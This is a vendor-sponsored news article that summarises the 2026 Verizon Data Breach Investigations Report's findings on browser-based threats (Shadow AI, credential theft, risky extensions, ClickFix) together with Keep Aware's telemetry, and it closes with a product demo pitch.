Introduction to the 2026 DBIR
The Verizon Data Breach Investigations Report (DBIR) is a yearly benchmark for the industry, providing valuable insights into the latest trends and threats in cybersecurity. This year's report, sponsored by Keep Aware, highlights the growing importance of browser-based attacks. As a contributor to the 2026 DBIR, the Keep Aware team had early visibility into the convergence of multiple independent data sources, pointing to a significant shift in how attackers operate.
Shadow AI: A Mainstream Enterprise Risk
The 2026 DBIR identifies Shadow AI as the third most common non-malicious insider action observed in Data Loss Prevention (DLP) datasets, representing a fourfold increase from the previous year. Employees are using personal AI services, such as ChatGPT, for tasks, which can lead to unauthorized data exfiltration. Keep Aware's browser telemetry reveals that over half of AI prompt inputs are sent to personal accounts, and 23% of sensitive prompt uploads involve data transiting through personal or unverified accounts.
Credential Abuse and the Browser's Detection Gap
The 2026 DBIR found that 39% of breaches involved credential abuse, while Keep Aware's attack data from 2025 puts browser-based credential theft as the number one browser-based attack, accounting for approximately 41% of observed threat activity. The majority of these attacks are invisible to traditional tooling, with 63% of Microsoft-themed phishing sites not flagged by any VirusTotal vendor at the time of employee exposure.
Browser Extensions: Privileged, Ungoverned, and Expanding
The 2026 DBIR flagged that the average enterprise had more than 15% of users with unauthorized AI extensions installed. However, the extension problem is broader than AI tooling alone, with 13% of unique browser extensions observed across Keep Aware's customer base classified as high or critical risk. Poor-reputation extensions are often labeled as "productivity" tools by browser marketplaces, making category-based allowlisting functionally useless.
ClickFix and Browser-Native Social Engineering
Both the 2026 DBIR and Keep Aware's State of Browser Security Report call out ClickFix as an emerging technique worth tracking. ClickFix is a deceptive social engineering tactic used to get a user to unknowingly execute malicious code from the browser and on the host machine. This threat begins in the browser but quickly continues on the endpoint, compromising the machine with info stealers and remote access to attackers.
The Human Element Continues to be a (Browser) Problem
The 2026 DBIR found that 62% of breaches involved the human element, with phishing initiating 16% of incidents. Keep Aware's browser-layer data shows phishing and social engineering accounted for 46% of browser attacks observed across 2025. Attackers are constantly evolving browser-based social engineering tactics, making it essential to have browser-level visibility to detect these threats.
Conclusion and Recommendations
Shadow AI, credential theft, malicious extensions, and browser-native social engineering techniques like ClickFix all execute inside the browser, producing artifacts that are most visible at the browser layer. Security programs that rely exclusively on network, endpoint, and identity telemetry will continue to have blind spots in exactly the places attackers have learned to operate. Securing the browser is no longer optional, and security teams should consider implementing browser-level visibility to detect and prevent these threats.
Request a demo of Keep Aware to see what your current tools are missing. Keep Aware contributed data to the Verizon 2026 Data Breach Investigations Report, and their 2026 State of Browser Security Report is available for further reading.
Source: BleepingComputer